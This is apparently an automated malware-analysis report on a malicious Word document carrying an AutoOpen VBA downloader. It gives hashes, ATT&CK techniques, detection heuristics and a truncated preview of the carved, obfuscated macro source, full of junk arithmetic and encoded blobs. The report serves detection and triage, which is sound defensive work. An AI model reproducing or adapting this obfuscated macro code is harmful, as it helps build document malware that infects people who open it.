Office (OLE) malware analysis — malicious · 1445e9dd185fe825

MALICIOUS

Office (OLE)

150.5 KB Created: 2018-03-29 14:12:00 Authoring application: Microsoft Office Word First seen: 2018-04-12

MD5: 289e8bcc64bebb43bfc1261da574e64c SHA-1: 762de3066bb2b0eae9cb7925830b1d557941759f SHA-256: 1445e9dd185fe825ff51bebd51ec395ba636e9af8ec2ac0a77f939623d0c54d6

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for initial execution. Heuristics indicate the macro uses CreateObject and p-code execution, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34197 bytes
SHA-256: `0e793cdbf5455e4114c3d15e290d0de94818171b8ee7097dddc44390b4dfa7ac`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 22 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YiVVliTlbSzi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "rEYshZV" Function zmsUirAiRjIn() On Error Resume Next PEaAk = 3756 / Round(AaYGfV) + zXYXO - CStr(86437) * WpMKd * cAwKu * OPTcv * wUnTZ FitjE = DMtus wXMjavsWSpt = fdzlYF("vDCAYgBjADcAZQA3AGIANABlADkAMgBmAGMAMABkADYAM1MK", 4, 42) NpHrM = 99969 / Round(NMNGqd) + cVQYWD - CStr(30564) * FuRsv * GhYTXE * GvHHn * LurcCG kiwUY = zHjNZU diGGk = 32685 / Round(AFHINC) + VFPzWW - CStr(34008) * wKHQPM * pGvzJ * hbMLR * kmdNJw FYkUd = tjjvwT VkGispbKN = fdzlYF("QiTHDMAYQA2AGMAOABkAGQANAAxADgAMABhAGUAVwt", 5, 35) laQBN = 31340 / Round(VodCnE) + hKUzzU - CStr(19239) * BFmRX * lAjNr * KJWcz * DkRuhj wMWMz = zriZL IqOjU = 66195 / Round(IGpSW) + zfCfc - CStr(64128) * fSwBE * FstsiH * ovdJo * jMvLwU cuYmu = dNpquN VSCzvo = fdzlYF("CkhADQAZAA3AGMANwA3AGQAMAAxAGUAMABjADcAOQAzADkANwA0ADcANQA3ADAANAA5AGYAOQAwAGMAZABjAGYAMQA0ADAANgA5ADgANwBjADUAYgA5ADMAOAA0ADUANQBmADUANQA5ADUAYwA1ADUAOAA4AGQAZABhADgAZABlAGQAZAAwAGUAOQA0AGQANwADRfV", 3, 192) jdWOOL = 21841 / Round(PEBsq) + AEkHAj - CStr(97325) * KUHzv * vwEjwM * DpjzkJ * MqWuDl IFjuhd = SCHQQ PUWUur = 92245 / Round(EMHmj) + KNvwYN - CStr(51489) * iSUPW * kPsTWI * BkLjfi * ciMZt Shzhi = UzqDA iAhjNGm = fdzlYF("1Bi1AMAA5ADUAMwA5ADkAMAA0AGIANwBjAGMAYwA0ADkAMQA2AGYAMAAxADAtuk", 5, 56) VzapTo = 30368 / Round(wIcjNs) + ImvGvW - CStr(40891) * CPKpGo * LhLEKi * nPYJRC * EPUlk MuwFI = VXZIwJ fGEVmt = 56143 / Round(woniN) + ljzZw - CStr(63386) * CcnIi * AwkQnv * jsaoi * tYzwm XJvWoi = ScciQN iPDzDsqNGC = fdzlYF("MbR58uLxADYANwA3AGQAMQBlADIAZQBkAGUAMgAyADkAMQBiAGEAYgAxADkAOAA5ADEANAAwADQAOAA3AGYiZ", 8, 76) RdOLX = 722 / Round(HmsILu) + njEfAi - CStr(21612) * EavhG * dDOJba * QKlYm * QWDNdn fvYwQ = szZnQq aipHZ = 47252 / Round(ukzTwY) + FjrkMI - CStr(3188) * vdaITf * qwwbX * FRnio * wBiLC mRLPW = qYrmL QJruAEwDl = fdzlYF("jANAA4AGMANABhADgAYwBjAGUANgA1ADAANwBhAGYAMQAyADEANAA4AGMAOABlAGMAYgBjADgANwAyADQAYgBkAGEANgAyAGQANAA4ADUAYQAwAGQANwA3ADkANwBjADAAYQA2ADMANAA1ADIANwAwADEAHh9zzn", 2, 153) QFNqtA = 42801 / Round(APzRD) + XvEjR - CStr(34502) * khOsa * hkziSF * OjAGH * phXWRt RsvTL = tJfXz Rzjlq = 22396 / Round(OviPzw) + llBCA - CStr(35504) * iPRcFi * wpZcm * hEiOEJ * WEVtcv wwZqqH = ikRIl KWSNH = fdzlYF("hc3HAYQBiADMANQBkADAAMgAyADIAOAA3AGYAOQBhADkAMQBkADcAZAA0AGMAZgAxADgANABhAGYAYwAyAGMANgA3AGYAMQA3ADgAMgAyADcAMwBlADcAYgBmADkRuGb", 5, 120) dQFEmM = 16525 / Round(jDnwqj) + itYAJz - CStr(9137) * Qjmidz * QFTcI * wQGQn * Rulrz iDqtHb = YQoVAh biCBkW = 31441 / Round(blzzcA) + sFXuX - CStr(80570) * ZNObC * PVsbEO * zLcAKR * IBWqG PUwqW = HHFom oOHMDFsF = fdzlYF("1azwK2ANwAxADAANgAxADkANQA5AGMANAA4ADcAZABjAGUAZgAxADIANAAyAGMAMQA5A2zR", 7, 62) TjiGt = 46893 / Round(NRShcX) + FSLXqX - CStr(39656) * RvYBFu * atWpr * isBIwz * DwnUTm oviwP = mSihrT uXHDt = 84891 / Round(lrzSk) + HinzAJ - CStr(80815) * MHazv * tLWpw * FNdBlR * Tbkpo zqipsR = qDiPhD LHwZt = fdzlYF("FQAyADcAMgBiADQAOABmADYANAAwADQAYwAwADkAMAA3ADcAZQBlAGQAYgBkAGYAYgAzADcAPzPZYi", 2, 71) WZZUIU = 81936 / Round(tAlMio) + rbRlU - CStr(92757) * KWiXKD * fNUhT * uCPhUo * whDfi UMGww = CrOCqk wVzqTi = 441 / Round(wwzvRj) + KwmrV - CStr(84362) * VczhG * WXRGAA * aAMZLY * jBjzYH zjPKOq = zXtlXX SzZiViaZDhn = fdzlYF("w%G8dEAYgA1AGEAMwAxAGIAYgA0ADgAZABiADEAZABiADMANgA1AGQAMwAyADcAYwAyADkANgBkADYAMQA0AGUAMwA4ADEAMgBiADYAO1.bf", 6, 99) ZituQ = 74447 / Round(JlMfzr) + UswJzr - CStr(48346) * CvmKQb * TnoAcK * qEIUJ * vCiRwt iucYfz = czIFWz dCOWYj = 44976 / Round(SoQMH) + zGYjP - CStr(24109) * wVdRBd * ZiVHC * PzpLUi * DRJoz ojRFiF = FihkF XwiatjZwGZk = fdzlYF("WBlADAANwAyADUAZABmADYAZgBhAGUAZQAwAGEANQA1ADMAMwBkAGMAOAAzAGIAZgA0AGQAOABjAGMAMgBkADUAZgA4ADkAOQA3AGMAOAA4AGUANABlADMANAAzADkANwBmADcAMgA4ADgANwAyAGMANQAwADUAMAA1ADYANwA3AGEANABQn73R", 2, 177) GMzjS = 15500 / Round(RuAQN) + lIpjM - CStr(78852) * KobId * ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.